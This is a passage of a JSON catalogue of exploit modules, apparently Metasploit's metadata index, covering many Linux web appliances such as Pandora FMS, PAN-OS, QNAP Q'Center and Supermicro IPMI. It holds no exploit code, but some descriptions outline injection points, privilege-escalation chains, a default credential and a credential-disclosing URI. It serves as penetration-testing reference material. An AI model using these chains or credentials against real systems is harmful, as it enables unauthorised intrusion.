"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"NUUO NVRmini 2",
"ReadyNAS NETGEAR Surveillance"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/nuuo_nvrmini_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/nuuo_nvrmini_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/op5_config_exec": {
"name": "op5 v7.1.9 Configuration Command Execution",
"full_name": "exploit/linux/http/op5_config_exec",
"rank": 600,
"disclosure_date": "2016-04-08",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"hyp3rlinx"
],
"description": "op5 an open source network monitoring software.\n The configuration page in version 7.1.9 and below\n allows the ability to test a system command, which\n can be abused to run arbitrary code as an unpriv user.",
"references": [
"EDB-39676",
"URL-https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/op5_config_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/op5_config_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/openfiler_networkcard_exec": {
"name": "Openfiler v2.x NetworkCard Command Execution",
"full_name": "exploit/linux/http/openfiler_networkcard_exec",
"rank": 600,
"disclosure_date": "2012-09-04",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in Openfiler v2.x\n which could be abused to allow authenticated users to execute arbitrary\n code under the context of the 'openfiler' user. The 'system.html' file\n uses user controlled data from the 'device' parameter to create a new\n 'NetworkCard' object. The class constructor in 'network.inc' calls exec()\n with the supplied data. The 'openfiler' user may 'sudo /bin/bash' without\n providing a system password.",
"references": [
"BID-55490",
"URL-http://itsecuritysolutions.org/2012-09-06-Openfiler-v2.x-multiple-vulnerabilities/",
"OSVDB-93881",
"EDB-21191"
],
"platform": "Unix",
"arch": "cmd",
"rport": 446,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/openfiler_networkcard_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/openfiler_networkcard_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/pandora_fms_exec": {
"name": "Pandora FMS Remote Code Execution",
"full_name": "exploit/linux/http/pandora_fms_exec",
"rank": 600,
"disclosure_date": "2014-01-29",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower.\n It will leverage an unauthenticated command injection in the Anyterm service on\n port 8023/TCP. Commands are executed as the user \"pandora\". In Pandora FMS 4.1 and 5.0RC1\n the user \"artica\" is not assigned a password by default, which makes it possible to su\n to this user from the \"pandora\" user. The \"artica\" user has access to sudo without a\n password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0\n and lower force a password for the \"artica\" user during installation.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 8023,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Pandora 5.0RC1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/pandora_fms_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pandora_fms_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pandora_fms_sqli": {
"name": "Pandora FMS Default Credential / SQLi Remote Code Execution",
"full_name": "exploit/linux/http/pandora_fms_sqli",
"rank": 600,
"disclosure_date": "2014-02-01",
"type": "exploit",
"author": [
"Lincoln <Lincoln@corelan.be>",
"Jason Kratzer <pyoor@corelan.be>"
],
"description": "This module attempts to exploit multiple issues in order to gain remote\n code execution under Pandora FMS version <= 5.0 SP2. First, an attempt\n to authenticate using default credentials is performed. If this method\n fails, a SQL injection vulnerability is leveraged in order to extract\n the \"Auto Login\" password hash. If this value is not set, the module\n will then extract the administrator account's MD5 password hash.",
"references": [
"URL-http://pandorafms.com/downloads/whats_new_5-SP3.pdf",
"URL-http://blog.pandorafms.org/?p=2041"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Pandora FMS version <= 5.0 SP2"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/pandora_fms_sqli.rb",
"is_install_path": true,
"ref_name": "linux/http/pandora_fms_sqli",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/panos_readsessionvars": {
"name": "Palo Alto Networks readSessionVarsFromFile() Session Corruption",
"full_name": "exploit/linux/http/panos_readsessionvars",
"rank": 600,
"disclosure_date": "2017-12-11",
"type": "exploit",
"author": [
"Philip Pettersson <philip.pettersson@gmail com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a chain of vulnerabilities in Palo Alto Networks products running\n PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using\n an authentication bypass flaw to to exploit an XML injection issue, which is then\n abused to create an arbitrary directory, and finally gains root code execution by\n exploiting a vulnerable cron script. This module uses an initial reverse TLS callback\n to stage arbitrary payloads on the target appliance. The cron job used for the final\n payload runs every 15 minutes by default and exploitation can take up to 20 minutes.",
"references": [
"CVE-2017-15944",
"URL-https://seclists.org/fulldisclosure/2017/Dec/38",
"BID-102079"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-03-23 19:38:14 +0000",
"path": "/modules/exploits/linux/http/panos_readsessionvars.rb",
"is_install_path": true,
"ref_name": "linux/http/panos_readsessionvars",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/peercast_url": {
"name": "PeerCast URL Handling Buffer Overflow",
"full_name": "exploit/linux/http/peercast_url",
"rank": 200,
"disclosure_date": "2006-03-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.",
"references": [
"CVE-2006-1148",
"OSVDB-23777",
"BID-17040"
],
"platform": "Linux",
"arch": "x86",
"rport": 7144,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PeerCast v0.1212 Binary"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/peercast_url.rb",
"is_install_path": true,
"ref_name": "linux/http/peercast_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/php_imap_open_rce": {
"name": "php imap_open Remote Code Execution",
"full_name": "exploit/linux/http/php_imap_open_rce",
"rank": 400,
"disclosure_date": "2018-10-23",
"type": "exploit",
"author": [
"Anton Lopanitsyn",
"Twoster",
"h00die",
"Paolo Serracino",
"Pietro Minniti",
"Damiano Proietti"
],
"description": "The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an\n IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand\n option can be passed from imap_open to execute arbitrary commands.\n While many custom applications may use imap_open, this exploit works against the following applications:\n e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.\n Prestashop exploitation requires the admin URI, and administrator credentials.\n suiteCRM/e107 require administrator credentials. Fixed in php 5.6.39.",
"references": [
"URL-https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395",
"URL-https://github.com/Bo0oM/PHP_imap_open_exploit",
"EDB-45865",
"EDB-46136",
"URL-https://bugs.php.net/bug.php?id=76428",
"CVE-2018-19518",
"CVE-2018-1000859"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"prestashop",
"suitecrm",
"e107v2",
"Horde IMP H3",
"custom"
],
"mod_time": "2019-01-18 19:43:45 +0000",
"path": "/modules/exploits/linux/http/php_imap_open_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/php_imap_open_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapp_ldapsyncnow_exec": {
"name": "PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution",
"full_name": "exploit/linux/http/pineapp_ldapsyncnow_exec",
"rank": 600,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"Dave Weinstein",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on PineApp Mail-SeCure\n 3.70. The vulnerability exists on the ldapsyncnow.php component, due to the insecure\n usage of the shell_exec() php function. This module has been tested successfully\n on PineApp Mail-SeCure 3.70.",
"references": [
"ZDI-13-185",
"OSVDB-95781"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PineApp Mail-SeCure 3.70"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapp_ldapsyncnow_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapp_livelog_exec": {
"name": "PineApp Mail-SeCure livelog.html Arbitrary Command Execution",
"full_name": "exploit/linux/http/pineapp_livelog_exec",
"rank": 600,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on PineApp Mail-SeCure\n 3.70. The vulnerability exists on the livelog.html component, due to the insecure\n usage of the shell_exec() php function. This module has been tested successfully\n on PineApp Mail-SeCure 3.70.",
"references": [
"ZDI-13-184",
"OSVDB-95779"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PineApp Mail-SeCure 3.70"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/pineapp_livelog_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapp_livelog_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapp_test_li_conn_exec": {
"name": "PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution",
"full_name": "exploit/linux/http/pineapp_test_li_conn_exec",
"rank": 600,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"Dave Weinstein",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on PineApp Mail-SeCure\n 3.70. The vulnerability exists on the test_li_connection.php component, due to the\n insecure usage of the system() php function. This module has been tested successfully\n on PineApp Mail-SeCure 3.70.",
"references": [
"CVE-2013-6829",
"ZDI-13-188",
"OSVDB-95782"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PineApp Mail-SeCure 3.70"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapp_test_li_conn_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapple_bypass_cmdinject": {
"name": "Hak5 WiFi Pineapple Preconfiguration Command Injection",
"full_name": "exploit/linux/http/pineapple_bypass_cmdinject",
"rank": 600,
"disclosure_date": "2015-08-01",
"type": "exploit",
"author": [
"catatonicprime"
],
"description": "This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.\n These devices may typically be identified by their SSID beacons of 'Pineapple5_....';\n Provided as part of the TospoVirus workshop at DEFCON23.",
"references": [
"CVE-2015-4624"
],
"platform": "Unix",
"arch": "cmd",
"rport": 1471,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WiFi Pineapple 2.0.0 - 2.3.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/pineapple_bypass_cmdinject.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapple_bypass_cmdinject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/pineapple_preconfig_cmdinject": {
"name": "Hak5 WiFi Pineapple Preconfiguration Command Injection",
"full_name": "exploit/linux/http/pineapple_preconfig_cmdinject",
"rank": 600,
"disclosure_date": "2015-08-01",
"type": "exploit",
"author": [
"catatonicprime"
],
"description": "This module exploits a command injection vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.\n We use a combination of default credentials with a weakness in the anti-csrf generation to achieve\n command injection on fresh pineapple devices prior to configuration. Additionally if default credentials fail,\n you can enable a brute force solver for the proof-of-ownership challenge. This will reset the password to a\n known password if successful and may interrupt the user experience. These devices may typically be identified\n by their SSID beacons of 'Pineapple5_....'; details derived from the TospoVirus, a WiFi Pineapple infecting\n worm.",
"references": [
"CVE-2015-4624"
],
"platform": "Unix",
"arch": "cmd",
"rport": 1471,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WiFi Pineapple 2.0.0 - 2.3.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/pineapple_preconfig_cmdinject.rb",
"is_install_path": true,
"ref_name": "linux/http/pineapple_preconfig_cmdinject",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/piranha_passwd_exec": {
"name": "RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution",
"full_name": "exploit/linux/http/piranha_passwd_exec",
"rank": 600,
"disclosure_date": "2000-04-04",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module abuses two flaws - a metacharacter injection vulnerability in the\n HTTP management server of RedHat 6.2 systems running the Piranha\n LVS cluster service and GUI (rpm packages: piranha and piranha-gui).\n The vulnerability allows an authenticated attacker to execute arbitrary\n commands as the Apache user account (nobody) within the\n /piranha/secure/passwd.php3 script. The package installs with a default\n user and password of piranha:q which was exploited in the wild.",
"references": [
"CVE-2000-0248",
"OSVDB-289",
"BID-1148",
"CVE-2000-0322",
"OSVDB-1300",
"BID-1149"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (piranha-gui-0.4.12-1.i386.rpm)"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/linux/http/piranha_passwd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/piranha_passwd_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/qnap_qcenter_change_passwd_exec": {
"name": "QNAP Q'Center change_passwd Command Execution",
"full_name": "exploit/linux/http/qnap_qcenter_change_passwd_exec",
"rank": 600,
"disclosure_date": "2018-07-11",
"type": "exploit",
"author": [
"Ivan Huertas",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in the\n `change_passwd` API method within the web interface of QNAP Q'Center\n virtual appliance versions prior to 1.7.1083.\n\n The vulnerability allows the 'admin' privileged user account to\n execute arbitrary commands as the 'admin' operating system user.\n\n Valid credentials for the 'admin' user account are required, however,\n this module also exploits a separate password disclosure issue which\n allows any authenticated user to view the password set for the 'admin'\n user during first install.\n\n This module has been tested successfully on QNAP Q'Center appliance\n version 1.6.1075.",
"references": [
"CVE-2018-0706",
"CVE-2018-0707",
"EDB-45015",
"URL-https://www.coresecurity.com/advisories/qnap-qcenter-virtual-appliance-multiple-vulnerabilities",
"URL-https://seclists.org/fulldisclosure/2018/Jul/45",
"URL-https://www.securityfocus.com/archive/1/542141",
"URL-https://www.qnap.com/en-us/security-advisory/nas-201807-10"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Auto"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/http/qnap_qcenter_change_passwd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/qnap_qcenter_change_passwd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/raidsonic_nas_ib5220_exec_noauth": {
"name": "Raidsonic NAS Devices Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/raidsonic_nas_ib5220_exec_noauth",
"rank": 0,
"disclosure_date": "2013-02-04",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Different Raidsonic NAS devices are vulnerable to OS command injection via the web\n interface. The vulnerability exists in timeHandler.cgi, which is accessible without\n authentication. This module has been tested with the versions IB-NAS5220 and\n IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon\n configuration, this module is set to ManualRanking and could cause target instability.",
"references": [
"OSVDB-90221",
"EDB-24499",
"BID-57958",
"URL-http://www.s3cur1ty.de/m1adv2013-010"
],
"platform": "Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/raidsonic_nas_ib5220_exec_noauth",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/railo_cfml_rfi": {
"name": "Railo Remote File Include",
"full_name": "exploit/linux/http/railo_cfml_rfi",
"rank": 600,
"disclosure_date": "2014-08-26",
"type": "exploit",
"author": [
"Bryan Alexander <drone@ballastsecurity.net>",
"bperry"
],
"description": "This module exploits a remote file include vulnerability in Railo,\n tested against version 4.2.1. First, a call using a vulnerable\n <cffile> line in thumbnail.cfm allows an attacker to download an\n arbitrary PNG file. By appending a .cfm, and taking advantage of\n a directory traversal, an attacker can append cold fusion markup\n to the PNG file, and have it interpreted by the server. This is\n used to stage and execute a fully-fledged payload.",
"references": [
"CVE-2014-5468",
"URL-http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/"
],
"platform": "Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/railo_cfml_rfi.rb",
"is_install_path": true,
"ref_name": "linux/http/railo_cfml_rfi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/rancher_server": {
"name": "Rancher Server - Docker Exploit",
"full_name": "exploit/linux/http/rancher_server",
"rank": 600,
"disclosure_date": "2017-07-27",
"type": "exploit",
"author": [
"Martin Pizala"
],
"description": "Utilizing Rancher Server, an attacker can create a docker container\n with the '/' path mounted with read/write permissions on the host\n server that is running the docker container. As the docker container\n executes command as uid 0 it is honored by the host operating system\n allowing the attacker to edit/create files owed by root. This exploit\n abuses this to creates a cron job in the '/etc/cron.d/' path of the\n host server.\n\n The Docker image should exist on the target system or be a valid image\n from hub.docker.com.\n\n Use `check` with verbose mode to get a list of exploitable Rancher\n Hosts managed by the target system.",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux"
],
"mod_time": "2017-10-07 01:10:23 +0000",
"path": "/modules/exploits/linux/http/rancher_server.rb",
"is_install_path": true,
"ref_name": "linux/http/rancher_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/realtek_miniigd_upnp_exec_noauth": {
"name": "Realtek SDK Miniigd UPnP SOAP Command Execution",
"full_name": "exploit/linux/http/realtek_miniigd_upnp_exec_noauth",
"rank": 300,
"disclosure_date": "2015-04-24",
"type": "exploit",
"author": [
"Ricky \"HeadlessZeke\" Lawshae",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\n there is no output for the executed command. This module has been tested successfully on a\n Trendnet TEW-731BR router with emulation.",
"references": [
"CVE-2014-8361",
"ZDI-15-155",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko",
"URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055"
],
"platform": "",
"arch": "",
"rport": 52869,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/realtek_miniigd_upnp_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/riverbed_netprofiler_netexpress_exec": {
"name": "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
"full_name": "exploit/linux/http/riverbed_netprofiler_netexpress_exec",
"rank": 600,
"disclosure_date": "2016-06-27",
"type": "exploit",
"author": [
"Francesco Oddo <francesco.oddo@security-assessment.com>"
],
"description": "This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress\n virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form\n can be exploited to add a malicious user into the application's database. An attacker can then exploit a\n command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure\n configuration of the sudoers file can be abused to escalate privileges to root.",
"references": [
"URL-http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf"
],
"platform": "Linux",
"arch": "x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/riverbed_netprofiler_netexpress_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/samsung_srv_1670d_upload_exec": {
"name": "Samsung SRN-1670D Web Viewer Version 1.0.0.193 Arbitrary File Read and Upload",
"full_name": "exploit/linux/http/samsung_srv_1670d_upload_exec",
"rank": 400,
"disclosure_date": "2017-03-14",
"type": "exploit",
"author": [
"Omar Mezrag <omar.mezrag@realistic-security.com>",
"Realistic Security",
"Algeria"
],
"description": "This module exploits an unrestricted file upload vulnerability in\n Web Viewer 1.0.0.193 on Samsung SRN-1670D devices. The network_ssl_upload.php file\n allows remote authenticated attackers to upload and execute arbitrary\n PHP code via a filename with a .php extension, which is then accessed via a\n direct request to the file in the upload/ directory.\n\n To authenticate for this attack, one can obtain web-interface credentials\n in cleartext by leveraging the existing local file read vulnerability\n referenced by CVE-2015-8279, which allows remote attackers to read the\n web interface credentials by sending a request to:\n cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI.",
"references": [
"CVE-2017-16524",
"URL-https://github.com/realistic-security/CVE-2017-16524",
"CVE-2015-8279",
"URL-http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Samsung SRN-1670D 1.0.0.193"
],
"mod_time": "2018-01-10 20:13:42 +0000",
"path": "/modules/exploits/linux/http/samsung_srv_1670d_upload_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/samsung_srv_1670d_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/seagate_nas_php_exec_noauth": {
"name": "Seagate Business NAS Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/seagate_nas_php_exec_noauth",
"rank": 300,
"disclosure_date": "2015-03-01",
"type": "exploit",
"author": [
"OJ Reeves <oj@beyondbinary.io>"
],
"description": "Some Seagate Business NAS devices are vulnerable to command execution via a local\n file include vulnerability hidden in the language parameter of the CodeIgniter\n session cookie. The vulnerability manifests in the way the language files are\n included in the code on the login page, and hence is open to attack from users\n without the need for authentication. The cookie can be easily decrypted using a\n known static encryption key and re-encrypted once the PHP object string has been\n modified.\n\n This module has been tested on the STBN300 device.",
"references": [
"CVE-2014-8684",
"CVE-2014-8686",
"CVE-2014-8687",
"EDB-36202",
"URL-http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/",
"URL-https://beyondbinary.io/advisory/seagate-nas-rce/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/seagate_nas_php_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/smt_ipmi_close_window_bof": {
"name": "Supermicro Onboard IPMI close_window.cgi Buffer Overflow",
"full_name": "exploit/linux/http/smt_ipmi_close_window_bof",
"rank": 400,
"disclosure_date": "2013-11-06",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow on the Supermicro Onboard IPMI controller web\n interface. The vulnerability exists on the close_window.cgi CGI application, and is due\n to the insecure usage of strcpy. In order to get a session, the module will execute\n system() from libc with an arbitrary CMD payload sent on the User-Agent header. This\n module has been tested successfully on Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n SMT_X9_214.",
"references": [
"CVE-2013-3623",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb",
"is_install_path": true,
"ref_name": "linux/http/smt_ipmi_close_window_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/sophos_wpa_iface_exec": {
"name": "Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",
"full_name": "exploit/linux/http/sophos_wpa_iface_exec",
"rank": 600,
"disclosure_date": "2014-04-08",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module takes advantage of two vulnerabilities in order to gain remote code execution as root\n as an otherwise non-privileged authorized user. By taking advantage of a mass assignment\n vulnerability that allows an unprivileged authenticated user to change the administrator's\n password hash, the module updates the password to login as the admin to reach the second vulnerability.\n No server-side sanitization is done on values passed when configuring a static network interface.\n This allows an administrator user to run arbitrary commands in the context of the web application,\n which is root when configuring the network interface. This module will inadvertently delete\n any other users that may have been present as a side effect of changing the admin's password.",
"references": [
"CVE-2014-2849",
"CVE-2014-2850",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-14-069/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Sophos Web Protection Appliance 3.8.1.1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/sophos_wpa_iface_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/sophos_wpa_iface_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/sophos_wpa_sblistpack_exec": {
